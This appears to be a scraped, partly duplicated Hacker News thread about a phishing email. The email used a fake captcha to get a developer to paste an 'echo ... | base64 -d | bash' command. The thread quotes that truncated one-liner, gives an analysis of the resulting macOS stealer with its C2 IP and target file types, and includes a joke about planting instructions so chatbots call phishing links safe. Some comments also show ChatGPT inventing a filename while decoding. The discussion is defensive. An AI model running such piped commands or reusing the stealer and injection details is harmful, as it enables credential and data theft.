Better yet - ChatGPT didn't actually decode the blob accurately.
It nails the URL, but manages somehow to get the temporary filename completely wrong (the actual filename is /tmp/pjKmMUFEYv8AlfKR, but ChatGPT says /tmp/lRghl71wClxAGs).
It's possible the screenshot is from a different payload, but I'm more inclined to believe that ChatGPT just squinted and made up a plausible /tmp/ filename.
In this case it doesn't matter what the filename is, but it's not hard to imagine a scenario where it did (e.g. it was a key to unlock the malware, an actually relevant filename, etc.).
I just pasted the blob in my terminal without the pipe to bash, felt smart, then realized if they had snuck `aaa;some-bad-cmd;balblabla` in there I'd have cooked myself.
Geez, I skimmed the image with the "steps" and the devtools next to it and assumed it was steps to get the user to open the DevTools, but later when he said it would download a file I thought "You can tell the DevTools to download a file and execute it as a shell script?!".
Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
Our call center had to develop a procedure and do training around explaining to grandmas why we will not let them purchase those iTunes giftcards, and that their relative is not actually in prison anywhere, and that no prison accepts iTunes gift cards for bail.
There's no such thing as "too obvious" when it comes to computers, because normal people are trained by the entire industry, by every interaction, and by all of their experience to just treat computers as magic black boxes that you chant rituals to and sometimes they do what you want.
Even when the internet required a bit more effort to get on to, it was still trivial to get people to delete System32
The reality is that your CEO will fall for it.
I mean come on, do you not do internal phishing testing? You KNOW how many people fall for it.
> Phishing emails disguised as support inquiries are getting more sophisticated, too. They read naturally, but something always feels just a little off — the logic doesn’t quite line up, or the tone feels odd.
The phrase "To better prove you are not a robot" used in this attack is a great example. Easy to glance over if you're reading quickly, but a clear red flag.
My standard procedure for copying and pasting commands from a website, is to first run it through `hd` to make sure there's no fuckery with Unicode or escape sequences:
xclip -selection -clipboard -o | hd
From the developer's post, I copied and pasted up to the execution and it was very obvious what the fuckery was as the author found out (xpaste is my paste to stdout alias):
As artificial intelligence has evolved, so have hacking techniques. Attacks using techniques like deepfake and phishing have become increasingly prevalent.Multi-layered attacks began to be created.While they impersonate companies in the first layer, they bypass security systems (2FA etc.) in the second layer.
Perhaps those working in the field of artificial intelligence can also make progress in detecting such attacks with artificial intelligence and blocking them before they reach the end user.
I'm seeing a lot more of these phishing links relying on sites.google.com . Users are becoming trained to look at the domain, which appears correct to them. Is it a mistake of Google to continue to let people post user content on a subdomain of their main domain?
It’s interesting how these big tech companies are playing a role in all these scams. I do a fair amount of paid ads on Facebook, and I get probably about 20 phishing messages a day via Facebook channels; trying to get me to install fake Facebook ads management apps (iOS TestFlight), or leading me to Facebook.com urls that are phishing pages via facebooks custom page designer.
These messages come through Facebook, use facebooks own infrastructure to host their payloads, and use language which Facebook would know should only come from their own official channels. How is this not super easy for Facebook to block?? I can only explain it as sheer laziness/lack of care.
As long as sites.google.com is not blocked by Chrome (which will never happen) or until Google stops making money on them (which won't happen either because spammers are paying for it), Google will continue to run the service.
To me the scariest support email would be discovering that the customer's 'bug' is actually evidence that they are in mortal danger, and not being sure the assailant wasn't reading everything I'm telling the customer.
I thought perhaps this was going that way up until around the echo | bash bit.
I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.
Not helped by the civilizational-infrastructure absence of a role containing someone smart that you can take a bizarre situation to, and expect to get something more than a brush-off.
Several 911 calls of people sounding to be ordering a pizza but calling for help, where they attacker can also hear the caller. Example: https://youtu.be/UiWTmUNDFRg
> echo -n Y3VybCAtc0w... | base64 -d | bash
...
> executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it
You needed ChatGPT for that? Decoding the base64 blob without huring yourself is very easy. I don't know if OP is really a dev or in the support department, but in any case: as a customer, I would be worried. Hint: Just remove the " | bash" and you will easily see what the attacker tried you to make execute.
The binary itself appears to be a remote-access trojan and data exfiltration malware for MacOS. It provides a reverse-shell via http://83.219.248.194 and exfiltrates files with the following extensions: txt rtf doc docx xls xlsx key wallet jpg dat pdf pem asc ppk rdp sql ovpn kdbx conf json It looks quite similar to AMOS - Atomic MacOS Stealer.
It also seems to exfiltrate browser session data + cookies, the MacOS keychain database, and all your notes in MacOS Notes.
It's moderately obfuscated, mostly using XOR cipher to obscure data both inside the binary (like that IP address for the C2 server) and also data sent to/from the C2 server.
In Windows CMD you don’t even need to hit return at the end. They can just add a line break to the copied text and as soon as you paste into the command line (just a right click!), you own yourself.
I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the latest versions of everything. What’s with all the “please follow this step-by-step guide to getting hacked”?
> My app’s website doesn’t even show a cookie consent dialog, I don’t track or serve ads, so there’s no need for that.
I just want to point out a slight misconception. GDPR tracking consent isn't a question of ads, any manner of user tracking requires explicit consent even if you use it for e.g. internal analytics or serving content based on anonymous user behavior.
It’s common in phishing schemes to either have a non-functional site hosting only the payload or one that hosts a full front appearing like a normal website, usually a blog with news.
Remember, the mac OSX "brew" webpage has a nice helpful "copy to clipboard" of the modern equivalent of "run this SHAR file" -we've being trained to respect the HTTPS:// label, and then copy-paste-run.
This is tame and not scary compared to the kinds of real live human social engineering scams I’ve seen especially targeting senior leaders. With those scams there’s a budget for real human scammers.
This thing was a very obvious scam almost immediately. What real customer provides a screenshot with Google sites, captcha, and then asking you to run a terminal program?
Most non-technical users wouldn’t even fall for this because they’d be immediately be scared away with the command line aspect of it.
60 comments
[ 3.4 ms ] story [ 75.5 ms ] threadlol we are so cooked
It nails the URL, but manages somehow to get the temporary filename completely wrong (the actual filename is /tmp/pjKmMUFEYv8AlfKR, but ChatGPT says /tmp/lRghl71wClxAGs).
It's possible the screenshot is from a different payload, but I'm more inclined to believe that ChatGPT just squinted and made up a plausible /tmp/ filename.
In this case it doesn't matter what the filename is, but it's not hard to imagine a scenario where it did (e.g. it was a key to unlock the malware, an actually relevant filename, etc.).
https://cyberchef.org/#recipe=From_Base64('A-Za-z0-9%2B/%3D'...
Isn't it just basic problem solving skill? We gonna let AI do the thinky bit for us now?
Not so smart, after all.
Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
There's no such thing as "too obvious" when it comes to computers, because normal people are trained by the entire industry, by every interaction, and by all of their experience to just treat computers as magic black boxes that you chant rituals to and sometimes they do what you want.
Even when the internet required a bit more effort to get on to, it was still trivial to get people to delete System32
The reality is that your CEO will fall for it.
I mean come on, do you not do internal phishing testing? You KNOW how many people fall for it.
The phrase "To better prove you are not a robot" used in this attack is a great example. Easy to glance over if you're reading quickly, but a clear red flag.
When I design my fishing links, I'll try to embed instructions for chatbots to suggest they're safe.
Perhaps those working in the field of artificial intelligence can also make progress in detecting such attacks with artificial intelligence and blocking them before they reach the end user.
I find this 7-year-old comment particularly ironic: https://news.ycombinator.com/item?id=17931747
Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.
This is what it put in my clipboard for me to paste:
An email they're saying is an insecure delivery system.
But we're supposed to click on links in these special emails.
Fuck!
I thought perhaps this was going that way up until around the echo | bash bit.
I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.
> echo -n Y3VybCAtc0w... | base64 -d | bash ... > executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it
You needed ChatGPT for that? Decoding the base64 blob without huring yourself is very easy. I don't know if OP is really a dev or in the support department, but in any case: as a customer, I would be worried. Hint: Just remove the " | bash" and you will easily see what the attacker tried you to make execute.
It also seems to exfiltrate browser session data + cookies, the MacOS keychain database, and all your notes in MacOS Notes.
It's moderately obfuscated, mostly using XOR cipher to obscure data both inside the binary (like that IP address for the C2 server) and also data sent to/from the C2 server.
Lulu or Little Snitch should have warned the user and stopped the exfiltration of data.
I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the latest versions of everything. What’s with all the “please follow this step-by-step guide to getting hacked”?
No it didn't. It starts with "sites.google.com"
I just want to point out a slight misconception. GDPR tracking consent isn't a question of ads, any manner of user tracking requires explicit consent even if you use it for e.g. internal analytics or serving content based on anonymous user behavior.
Seems like a real company too e.g. https://pdf.indiamart.com/impdf/20303654633/MY-1793705/alumi...
This thing was a very obvious scam almost immediately. What real customer provides a screenshot with Google sites, captcha, and then asking you to run a terminal program?
Most non-technical users wouldn’t even fall for this because they’d be immediately be scared away with the command line aspect of it.
Really? you need ChatGPT to help you decode a base64 string into the plain text command it's masking?
Just based on that, I'd question the quality of the app that was targetted and wouldn't really trust it with any data.